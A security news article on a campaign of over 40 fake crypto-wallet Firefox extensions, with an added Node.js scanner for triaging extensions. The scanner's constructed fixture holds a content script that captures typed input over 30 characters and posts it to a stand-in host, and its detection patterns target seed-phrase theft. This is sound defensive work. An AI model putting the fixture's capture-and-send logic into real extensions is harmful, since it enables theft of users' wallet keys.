Over 40 malicious Firefox extensions steal crypto wallets
Author
NEXT2i
Researchers at Koi Security have uncovered a large-scale campaign within the Firefox Add-ons Store: more than 40 extensions impersonating well-known wallets (MetaMask, Coinbase, Trust Wallet, Phantom, Exodus, OKX, etc.) have been identified. Active since at least April 2025, some were uploaded as recently as last week.
Impersonation Methods and Data Collection
Disguise: The extensions use the official names and logos of popular wallets to mask their malicious nature.
Cloning: The majority are clones of open-source solutions. The legitimate code is reproduced, and malicious logic is then inserted to extract private keys and mnemonic phrases and transmit them to a remote server.
Input Interception: Some scripts intercept input fields as soon as the user enters more than 30 characters—typically the length of a real private key or recovery phrase.
Social Engineering: The extensions display a large number of fake 5-star reviews to deceive the user regarding their popularity and legitimacy.
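The cloning and input-interception traits above are exactly the kind of thing a store reviewer or an enterprise browser-management team can triage statically before an extension is allowed. The following is an added example, not code from the article or from Koi Security: a small Node.js scanner over an unpacked extension (its manifest.json plus its scripts) that flags content scripts injected into every site, keystroke or input hooks, a length threshold on the captured value, and a call that ships data to a remote host. The two extensions it inspects, the collector host and the indicator list are constructed for the example.

```javascript
// Added example: static triage of an unpacked Firefox extension for the
// traits described in the article. Not the article's or Koi Security's code;
// sample extensions, host names and the indicator list are constructed.

const INDICATORS = [
  // hooks on user input (the clone has to see what is typed)
  { id: 'input-hook',   re: /addEventListener\s*\(\s*['"](input|keyup|keydown|change)['"]/ },
  // only reacts once the value is long enough to be a key or seed phrase
  { id: 'length-gate',  re: /\.length\s*>=?\s*\d{2,}/ },
  // something that can carry the value off the page
  { id: 'remote-send',  re: /\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b/ },
  // vocabulary that a wallet clone is interested in
  { id: 'secret-words', re: /\b(mnemonic|seed\s*phrase|private\s*key|recovery\s*phrase)\b/i },
];

// Manifest-level signals: broad host permissions and content scripts on every site.
function scanManifest(manifest) {
  const findings = [];
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  if (perms.includes('<all_urls>')) findings.push('manifest:all-urls-permission');
  for (const cs of manifest.content_scripts || []) {
    const everywhere = (cs.matches || []).some((m) => m === '<all_urls>' || m === '*://*/*');
    if (everywhere) findings.push('manifest:content-script-all-sites');
  }
  return findings;
}

// Script-level signals: each matching indicator is reported as "<file>:<id>".
function scanScript(name, source) {
  return INDICATORS.filter((i) => i.re.test(source)).map((i) => `${name}:${i.id}`);
}

// Correlate per script: an input hook, a length gate and a remote send in the
// same file is the pattern the article describes; hook plus send alone only
// earns a manual review, since legitimate wallets also talk to RPC nodes.
function triage(extension) {
  const findings = scanManifest(extension.manifest);
  let verdict = 'clean';
  for (const [name, src] of Object.entries(extension.scripts)) {
    const hits = scanScript(name, src);
    findings.push(...hits);
    const has = (id) => hits.includes(`${name}:${id}`);
    if (has('input-hook') && has('length-gate') && has('remote-send')) verdict = 'suspicious';
    else if (verdict === 'clean' && has('input-hook') && has('remote-send')) verdict = 'review';
  }
  return { verdict, findings };
}

// Constructed fixture: the shape of behaviour the article describes.
const SAMPLE_SUSPICIOUS = {
  manifest: {
    name: 'Wallet Helper (constructed sample)',
    manifest_version: 2,
    permissions: ['<all_urls>', 'storage'],
    content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'] }],
  },
  scripts: {
    'content.js': `
      document.addEventListener('input', (e) => {
        const v = e.target.value;
        if (v.length > 30) fetch('https://collector.example/log', { method: 'POST', body: v });
      });`,
  },
};

// Constructed fixture: a benign extension that also listens to input but
// stays on one site and never leaves the browser.
const SAMPLE_BENIGN = {
  manifest: {
    name: 'Notes (constructed sample)',
    manifest_version: 2,
    permissions: ['storage'],
    content_scripts: [{ matches: ['https://notes.example/*'], js: ['content.js'] }],
  },
  scripts: {
    'content.js': `
      document.addEventListener('change', (e) => browser.storage.local.set({ draft: e.target.value }));`,
  },
};

console.log(JSON.stringify(triage(SAMPLE_SUSPICIOUS), null, 2)); // verdict: suspicious
console.log(JSON.stringify(triage(SAMPLE_BENIGN), null, 2));     // verdict: clean
```

The output is a triage signal, not a verdict on its own: a genuine open-source wallet also handles seed phrases and makes network calls, so a `review` result should be followed by reading the diff between the submitted package and the upstream project it claims to be, which is where the inserted exfiltration logic shows up.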
Attacker Profile
Analysis of the source code and metadata reveals indications pointing toward a Russian-speaking group.
Mozilla's Response
Removal: Almost all of these extensions (with the exception of MyMonero Wallet at the time of reporting) have been removed from the store.
Prevention: Mozilla has also stated that they have implemented an early detection system to block malicious crypto wallet extensions as soon as they are identified.
Recommendations for Users
Verify Authors: Only install extensions from verified authors, and avoid VSIX versions or unofficial sources.
Check Statistics: Verify download statistics and reviews. An abnormal gap between the number of installations and the number of glowing reviews is highly suspicious.
Immediate Action: If you have already installed one of these wallet extensions, remove it immediately and monitor your accounts for any unusual activity.
Use Trusted Tools: Prioritize transparent, open-source solutions, such as uBlock Origin, to limit exposure risks.
General Context
This malicious wave is part of a rising trend of threats regarding browser extensions. Firefox, with its flexible APIs, facilitates the injection of malicious behaviors. This mirrors broader industry issues, as demonstrated by a recent study indicating that a third of malicious extensions detected on Chrome were still active despite regular checks.
Key Takeaways
Impact: Crypto-assets are stolen directly via the browser; the theft is irreversible and often invisible to the user until it is too late.
Exploited Flexibility: Firefox APIs allow this manipulation because they are sometimes more permissive than Chrome's.
Necessity: Increased vigilance is required when adding extensions, along with regular checks and the strict use of reliable sources.